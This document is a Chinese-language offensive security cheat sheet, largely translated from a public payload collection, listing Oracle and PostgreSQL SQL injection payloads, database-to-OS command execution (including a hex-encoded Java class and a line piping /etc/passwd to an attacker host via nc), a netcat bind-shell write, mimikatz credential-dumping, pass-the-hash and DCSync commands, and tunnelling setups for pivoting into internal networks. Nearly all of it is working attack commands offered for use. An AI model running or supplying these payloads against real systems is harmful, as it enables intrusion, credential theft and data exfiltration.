SQL ErrorSELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))
XDBURITYPE getblobXDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()
XDBURITYPE getclobXDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()

When the injection point is inside a string use : '||PAYLOAD--

Oracle SQL 盲注

DescriptionQuery
Version is 12.2SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';
Subselect is enabledSELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)
Table log_table existsSELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);
Column message exists in table log_tableSELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';
First letter of first message is tSELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';

Oracle SQL 时间注入

AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])

Oracle SQL 命令执行

Oracle Java Execution

  • List Java privileges
    sql select * from dba_java_policy select * from user_java_policy
  • Grant privileges
    sql exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute'); exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
  • Execute commands
    • 10g R2, 11g R1 and R2: DBMS_JAVA_TEST.FUNCALL()
      sql SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
    • 11g R1 and R2: DBMS_JAVA.RUNJAVA()
      sql SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL

Oracle Java Class

/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/

BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

or (hex encoded)

/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

References

注:大部分内容翻译至:https://github.com/swisskyrepo/PayloadsAllTheThings

postgresql

PostgreSQL 命令执行

CVE-2019–9193

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

使用 libc.so.6

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');

PostgreSQL 注释

--
/**/

PostgreSQL 链注入点符号

; #用于终止 SQL 命令。在语句中唯一可使用的位置是在字符串常量或引用标识符中。
|| #或语句

# 使用示例: 
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))

PostgreSQL 版本

SELECT version()

PostgreSQL 当前用户

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

PostgreSQL 用户列表

SELECT usename FROM pg_user

PostgreSQL 密码哈希列表

SELECT usename, passwd FROM pg_shadow

查询数据库管理员账户列表

SELECT usename FROM pg_user WHERE usesuper IS TRUE

PostgreSQL 权限列表

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

查询当前用户是否为超级用户

SHOW is_superuser; 
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;

PostgreSQL 数据库名称

SELECT current_database()

PostgreSQL 数据库列表

SELECT datname FROM pg_database

PostgreSQL 表格列表

SELECT table_name FROM information_schema.tables

PostgreSQL 列表列

SELECT column_name FROM information_schema.columns WHERE table_name='data_table'

PostgreSQL 报错注入

,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)

' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1

PostgreSQL XML 帮助器

select query_to_xml('select * from pg_user',true,true,''); -- 返回所有结果作为单个 xml 行
select database_to_xml(true,true,''); -- 将当前数据库转储为 XML
select database_to_xmlschema(true,true,''); -- 将当前数据库转储为 XML 架构

PostgreSQL 盲注

' and substr(version(),1,10) = 'PostgreSQL' and '1' -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1' -> KO

PostgreSQL 时间盲注

select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))

select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1

AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

PostgreSQL 堆叠查询

http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--

PostgreSQL 文件读取

select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);

PostgreSQL 文件写入

CREATE TABLE pentestlab (t TEXT);
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';

绕过过滤器

引号

使用 CHR

SELECT CHR(65)||CHR(66)||CHR(67);

使用 $ 符号(适用于 PostgreSQL 8及以上版本)

SELECT $$This is a string$$
SELECT $TAG$This is another string$TAG$

注:大部分内容翻译至:https://github.com/swisskyrepo/PayloadsAllTheThings

工具使用命令速查

mimikatz

官方 Github:https://github.com/gentilkiwi/mimikatz

获取登录凭证信息

mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
privilege::debug
sekurlsa::logonpasswords

lsass.exe 导出凭据

mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

mimikatz PTH 传递 cmd

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:cmd.exe" "exit"

mimikatz PTH 传递 mstsc

mimikatz "privilege::debug"  "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:mstsc.exe /restrictedadmin" "exit"
privilege::debug
sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 "/run:mstsc.exe /restrictedadmin"

SAM 数据库导出凭据

mimikatz "log" "lsadump::sam /sam:sam.hive /system:system.hive"  "exit"

bat 脚本获取凭据

@echo off
cd /d D:\tools\
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > C:\windows\temp\log.txt

导出域内所有用户hash

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

proxy tools

iox

下载地址:https://github.com/EddieIvan01/iox

proxy

在本地 0.0.0.0:1080启动Socks5服务

./iox proxy -l 1080

加密转发 socks5 代理:

VPS 监听(//将1080端口监听到的流量转发至50054端口):
nohup ./iox proxy -l 50054 -l 1081 -k 3211 > iox.log &  

在目标主机执行(//启动代理服务并发送至VPS 50054端口):
./iox proxy -r VPSIP:50054 -k 3211  

然后本地socks5代理:socks5://vps:1081

fwd

本地端口转发 3389 至VPS:

vps执行:
nohup ./iox fwd -l *8888 -l 33890 -k 22222

目标机器执行:
iox.exe fwd -r 192.168.0.1:3389 -r *VPSIP:8888 -k 22222

随后连接 VPS:33890 即可访问内网 3389

fuso

Github:https://github.com/editso/fuso

socks

VPS:
./fus

//被控机
./fuc.exe VPSIP 6722 --socks
  • linux:i686-unknown-linux-musl.zip
  • windows:x86_64-pc-windows-msvc.zip

readme

1. 端口转发
fuc --forward-host xxx.xxx.xxx.xxx --forward-port
   --forward-host: 转发到的地址
   --forward-port: 转发到的端口
   如: 转发流量到内网 10.10.10.4:3389
   > fuc --forward-host 10.10.10.4 --forward-port 3389

2. socks5:
fuc --socks --su --s5p xxx --s5u xxx
   --su: 可选的, 开启udp转发, 
   --s5p: 可选的, 认证密码, 默认不进行密码认证
   --s5u 可选的, 认证账号, 默认账号 anonymous
   --socks: 可选的, 开启socks5代理, 未指定--su的情况下不会转发udp
   如: 开启udp转发与密码认证
   > fuc --socks --su --s5p 123 --s5u socks
   此时, 已开启udp转发,连接密码为 "123",账号为 "socks"

3. 指定穿透成功时访问的端口
   fuc -b xxxx
   -b | --visit-bind-port: 可选的, 默认随机分配
   如: 访问外网端口 8888 转发到内网 80
   > fuc --forward-port 80 -b 8888

4. 桥接模式 注意: 目前不能转发udp
   fuc --bridge-listen xxxx --bridge-port xxx 
   --bridge-listen | --bl: 监听地址, 默认 127.0.0.1
   --bridge-port | --bp: 监听端口, 默认不启用桥接
   如: 开始桥接模式,并监听在9999端口, 本机ip地址为: 10.10.10.2
   > fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 开启桥接
   > fuc 10.10.10.2 9999 # 建立连接

   级联: 
   > fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 第一级, IP: 10.10.10.2
    > fuc --bridge-listen 0.0.0.0 --bridge-port 9991  10.10.10.2 9999 # 第二级, IP: 10.10.10.3
     > fuc 10.10.10.3 9991 # 最终 

5. 将连接信息通知到 Telegram 或其他
   fus --observer "program:[arguments]"
   --observer: 建立连接或断开连接时的钩子
   如: 使用bash脚本将连接信息通知到tg
   > fus --observer "/bin/bash:[telegram.sh]"

6. 指定客户端与服务端通信的端口
   fuc --channel-port 8888 ...
   --channel-port: 可选的, 客户端与服务端通信端口, 默认随机

pingtunnel+frp 搭 icmp 隧道

pingtunnel 下载:https://oss.ywhack.com/%E4%BB%A3%E7%90%86%E9%9A%A7%E9%81%93/pingtunnel-2.6

被控机

nohup ./pingtunnel -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:10000 -sock5 -1 -noprint 1 -nolog 1 >p.log &
nohup ./frpc -c frpc.ini > fff.log &

pingtunnel -l 监听本地的9999端口 -s vps主机IP -t vps主机frp服务端口

客户端frp配置

[common]
server_addr = 127.0.0.1
server_port = 10000
token = PassW0Rd

[zhaoshangju_10078]
type = tcp
remote_port = 10015
plugin = socks5
plugin_user = thIsuserAS
plugin_passwd = Passweqwe0Rm
use_encryption = true

VPS

./pingtunnel -type server
./frps -c frps.ini

本地代理vps的 10015 端口加上密码即可使用icmp隧道。

参考文章:https://www.cnblogs.com/cute-puli/p/15213394.html

FRP

  • 将 frps 及 frps.ini 放到具有公网 IP 的机器上。
  • 将 frpc 及 frpc.ini 放到处于内网环境的机器上。
  • 客户端:frpc -c frpc.ini
  • 服务端:frps -c frps.ini

Github:https://github.com/fatedier/frp

代理工具列表

后渗透工具列表

f8x

一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等

Supershell

Supershell C2 远控平台,基于反向SSH隧道获取完全交互式Shell

Viper

互联网攻击面管理&红队模拟平台

Sliver C2

Sliver C2 是一个开源的跨平台红队框架。

Impacket

内网渗透 Python 工具包

在手机上浏览此页面